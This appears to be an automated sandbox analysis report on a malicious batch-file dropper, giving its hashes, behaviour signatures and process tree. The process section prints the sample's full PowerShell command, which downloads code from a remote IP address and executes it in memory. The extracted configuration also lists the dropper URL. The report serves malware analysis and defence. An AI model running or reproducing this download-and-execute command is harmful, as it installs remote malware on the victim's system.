Analysis
max time kernel: 134s
max time network: 69s
platform: windows10_x64
resource: win10v200430
submitted: 20-05-2020 23:10
Static task: static1
Behavioral task: behavioral1
  Sample: a1ced45242d2149282fc0a7230280012.bat
  Resource: win7v200430 (windows7_x64)
  0 signatures, 0 seconds
Behavioral task: behavioral2
  Sample: a1ced45242d2149282fc0a7230280012.bat
  Resource: win10v200430 (windows10_x64)
  0 signatures, 0 seconds
General
Target: a1ced45242d2149282fc0a7230280012.bat
Size: 217B
MD5: 41b00aedcf17cecfbeb6362ce3bcd14f
SHA1: c18a004d285abadf2b5840c9bb31c5cb9ae3a80c
SHA256: 33347fdae792b3a0eb66bd0476b6ddcfb4aa1334e8a0de8a7f0aa8b2d07daa50
SHA512: 1f0c5e210b4485ba274345201f4e5e5a5c30e5d217a347835ff2e759a8522f322d7428d33b9a529ad134930f9d65ccf642f8c84be93dc8cca8aeac40061ec455
Score: 10/10
Malware Config
Extracted
  Language: ps1
  Source: ps1.dropper
  URLs: http://185.103.242.78/pastes/a1ced45242d2149282fc0a7230280012
Signatures
Program crash (1 IoC)
  Processes:
    pid   pid_target  process       target process
    1872  900         WerFault.exe  powershell.exe
Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes:
    description                pid   process
    Token: SeRestorePrivilege  1872  WerFault.exe
    Token: SeBackupPrivilege   1872  WerFault.exe
    Token: SeDebugPrivilege    1872  WerFault.exe
Suspicious behavior: EnumeratesProcesses (14 IoCs)
  Processes:
    pid   process
    1872  WerFault.exe  (14 identical entries)
Processes
1. C:\Windows\system32\cmd.exe (PID 896)
   Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a1ced45242d2149282fc0a7230280012.bat"
   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 900)
      Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/a1ced45242d2149282fc0a7230280012');Invoke-KZMZWDCRYF;Start-Sleep -s 10000"
      3. C:\Windows\SysWOW64\WerFault.exe (PID 1872)
         Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 900 -s 704
         Signatures: Program crash; Suspicious use of AdjustPrivilegeToken; Suspicious behavior: EnumeratesProcesses